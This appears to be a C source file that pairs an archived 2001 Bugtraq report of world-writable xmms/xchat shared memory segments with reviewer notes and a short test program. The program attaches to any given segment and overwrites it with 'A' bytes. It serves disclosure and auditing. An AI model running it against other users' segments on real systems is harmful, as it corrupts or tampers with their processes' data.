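/*
 * Archived Bugtraq message (archive labels translated to English, values kept):
 *
 * 7430047 2001-11-03 12:22 +0200 /67 lines/ Julien VANEGUE <vanegu_j@epita.fr>
 * Sent by: joel@lysator.liu.se
 * Imported: 2001-11-05 03:42 by Brevbäraren
 * External recipient: bugtraq@securityfocus.com
 * External replies to: vanegu_j@epita.fr
 * Recipient: Bugtraq (import) <19669>
 * Subject: xmms/xchat full access shared memory segments
 * ------------------------------------------------------------
 * From: Julien VANEGUE <vanegu_j@epita.fr>
 * To: bugtraq@securityfocus.com
 * Message-ID: <0111031122230M.12122@daril>
 *
 * On slackware 8 :
 *
 * bash-2.05$ ipcs -m
 *
 * ------ Shared Memory Segments --------
 * key        shmid      owner      perms      bytes      nattch     status
 * 0x00000000 4216960    mayhem     777        196608     2          dest
 * 0x00000000 7636737    mayhem     777        196608     2          dest
 *
 * bash-2.05$ ipcs -p -m
 *
 * ------ Shared Memory Creator/Last-op --------
 * shmid      owner      cpid       lpid
 * 4216960    mayhem     3921       1406
 * 7636737    mayhem     26206      26209
 *
 * bash-2.05$ cat /proc/3921/cmdline ; echo
 * /opt/gnome/bin/xmms
 * bash-2.05$ cat /proc/26206/cmdline ; echo
 * /opt/gnome/bin/xchat
 * bash-2.05$
 *
 * Seems not to be exploitable (no fault) but still need to be fixed .
 */

/*
** test_shm.c
**
** Made by Julien Vanegue
** Login   <mayhem@hert.org>
**
** Reviewer notes:
**  - The finding is the "perms" column above: mode 777 lets every local
**    account attach the segment read/write, not only its owner.
**  - "No fault" only means the owning process did not crash. A segment that
**    other users can read and modify is still a confidentiality and integrity
**    problem for whatever data it carries (the page does not show what that
**    is).
**  - The fix belongs in the code that creates the segment: request
**    owner-only permissions in the shmget() flags (for example
**    IPC_CREAT | 0600). `ipcs -m` is the quick way to audit a host for
**    segments with wider modes.
**  - This program only verifies whether the calling user can attach and
**    write to a given segment; a successful run from a non-owner account
**    confirms the permission problem.
*/

/* Ask for the POSIX/XSI declarations (shmat, shmctl, sleep) on strict builds. */
#define _XOPEN_SOURCE 700

#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Report the failing call via errno and stop; do/while keeps it statement-safe. */
#define FATAL(str) do { perror(str); exit(EXIT_FAILURE); } while (0)

/* Print the command-line synopsis and exit with a failure status. */
void usage(void)
{
	/* The first argument is a shared-memory id (the original text said "semid"). */
	fprintf(stderr, "syntax: a.out shmid size\n");
	exit(EXIT_FAILURE);
}

/*
 * Parse a non-negative decimal number.
 * Returns 0 and stores the value in *out, or -1 on empty input, trailing
 * characters, a negative value or overflow. atoi() reported none of these.
 */
static int parse_number(const char *text, long *out)
{
	char *end;
	long value;

	errno = 0;
	value = strtol(text, &end, 10);
	if (end == text || *end != '\0' || errno == ERANGE || value < 0)
		return -1;
	*out = value;
	return 0;
}

/*
 * Attach to the segment named by argv[1], fill its first argv[2] bytes with
 * 'A', hold the attachment for two seconds, then detach.
 * Returns 0 on success; exits with a failure status on any error.
 */
int main(int argc, char **argv)
{
	struct shmid_ds ds;
	long shmid;
	long size;
	char *addr;

	if (argc != 3)
		usage();
	if (parse_number(argv[1], &shmid) < 0 || shmid > INT_MAX ||
	    parse_number(argv[2], &size) < 0)
		usage();

	/* The failing call here is shmat(); the original label said "shmget". */
	addr = shmat((int)shmid, NULL, 0);
	if (addr == (void *)-1)
		FATAL("shmat");

	/* Bound the write by the real segment size so it cannot run past the mapping. */
	if (shmctl((int)shmid, IPC_STAT, &ds) == -1)
		FATAL("shmctl");
	if ((unsigned long)size > (unsigned long)ds.shm_segsz) {
		fprintf(stderr, "size %ld exceeds segment size %lu\n",
			size, (unsigned long)ds.shm_segsz);
		shmdt(addr);
		exit(EXIT_FAILURE);
	}

	memset(addr, 'A', (size_t)size);
	sleep(2);

	if (shmdt(addr) == -1)
		FATAL("shmdt");
	return 0;
}

/* (7430047) /Julien VANEGUE <vanegu_j@epita.fr>/------ */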